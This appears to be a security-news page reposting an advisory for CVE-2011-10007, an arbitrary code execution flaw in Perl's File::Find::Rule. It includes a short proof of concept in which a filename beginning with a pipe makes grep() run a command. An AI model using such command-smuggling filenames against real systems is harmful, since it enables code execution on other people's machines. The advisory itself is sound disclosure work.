Close Menu
    DevStackTipsDevStackTips
    • Home
    • News & Updates
      1. Tech & Work
      2. View All

      This week in AI updates: Mistral’s new Le Chat features, ChatGPT updates, and more (September 5, 2025)

      September 6, 2025

      Designing For TV: Principles, Patterns And Practical Guidance (Part 2)

      September 5, 2025

      Neo4j introduces new graph architecture that allows operational and analytics workloads to be run together

      September 5, 2025

      Beyond the benchmarks: Understanding the coding personalities of different LLMs

      September 5, 2025

      Development Release: KDE Linux 20250906

      September 6, 2025

      Hitachi Energy Pledges $1B to Strengthen US Grid, Build Largest Transformer Plant in Virginia

      September 5, 2025

      How to debug a web app with Playwright MCP and GitHub Copilot

      September 5, 2025

      Between Strategy and Story: Thierry Chopain’s Creative Path

      September 5, 2025
    • Development
      1. Algorithms & Data Structures
      2. Artificial Intelligence
      3. Back-End Development
      4. Databases
      5. Front-End Development
      6. Libraries & Frameworks
      7. Machine Learning
      8. Security
      9. Software Engineering
      10. Tools & IDEs
      11. Web Design
      12. Web Development
      13. Web Security
      14. Programming Languages
        • PHP
        • JavaScript
      Featured

      Health Monitoring Android App using SQLite

      September 7, 2025
      Recent

      Health Monitoring Android App using SQLite

      September 7, 2025

      Convertedbook – Live LaTeX Preview in the Browser

      September 7, 2025

      Why browsers throttle JavaScript timers (and what to do about it)

      September 6, 2025
    • Operating Systems
      1. Windows
      2. Linux
      3. macOS
      Featured

      Speed Isn’t Everything When Buying SSDs – Here’s What Really Matters!

      September 8, 2025
      Recent

      Speed Isn’t Everything When Buying SSDs – Here’s What Really Matters!

      September 8, 2025

      14 Themes for Beautifying Your Ghostty Terminal

      September 8, 2025

      Development Release: KDE Linux 20250906

      September 6, 2025
    • Learning Resources
      • Books
      • Cheatsheets
      • Tutorials & Guides
    Home»Security»Common Vulnerabilities and Exposures (CVEs)»CVE-2011-10007 – Apache::FileFind::Rule Arbitrary Code Execution Vulnerability

    CVE-2011-10007 – Apache::FileFind::Rule Arbitrary Code Execution Vulnerability

    June 5, 2025

    CVE ID : CVE-2011-10007

    Published : June 5, 2025, 12:15 p.m. | 2 hours, 9 minutes ago

    Description : File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename.

    A file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed.

    Example:

    $ mkdir /tmp/poc; echo > “/tmp/poc/|id”
    $ perl -MFile::Find::Rule
        -E ‘File::Find::Rule->grep(“foo”)->in(“/tmp/poc”)’
    uid=1000(user) gid=1000(user) groups=1000(user),100(users)

    Severity: 0.0 | NA

    Visit the link for more details, such as CVSS details, affected products, timeline, and more…

    Source: Read More

    Facebook Twitter Reddit Email Copy Link
    Previous ArticleCVE-2025-5656 – PHPGurukul Complaint Management System SQL Injection Vulnerability
    Next Article CVE-2025-5663 – PHPGurukul Auto Taxi Stand Management System SQL Injection Vulnerability

    Related Posts

    Development

    Under lock and key: Safeguarding business data with encryption

    September 7, 2025
    Development

    Malicious npm Packages Impersonate Flashbots, Steal Ethereum Wallet Keys

    September 7, 2025
    Leave A Reply Cancel Reply

    For security, use of Google's reCAPTCHA service is required which is subject to the Google Privacy Policy and Terms of Use.

    Continue Reading

    CVE-2025-43757 – Liferay Portal Reflected Cross-Site Scripting (XSS) Vulnerability

    Common Vulnerabilities and Exposures (CVEs)

    This 34-inch ultrawide OLED blew me away – and its Prime Day deal makes it even better

    News & Updates

    CVE-2025-33102 – IBM Concert Software Weak Cryptography Vulnerability

    Common Vulnerabilities and Exposures (CVEs)

    ‘Moonlighter 2’ is coming soon to Xbox and PC, and it needs to be on every roguelike fan’s wishlist as of yesterday

    News & Updates

    Highlights

    Development

    Billing System using PHP and MySQL

    August 4, 2025

    The Billing System using PHP and MySQL is a role-based application designed to streamline and…

    ZDNET’s WWDC 2025 recap with Sabrina Ortiz and Jason Hiner

    June 12, 2025

    Lavrov CCCP T Shirt

    August 17, 2025

    I compared the best headphones from Apple, Sony, Bose, and Sonos: Here’s how the AirPods Max wins

    August 10, 2025
    © DevStackTips 2025. All rights reserved.
    • Contact
    • Privacy Policy

    Type above and press Enter to search. Press Esc to cancel.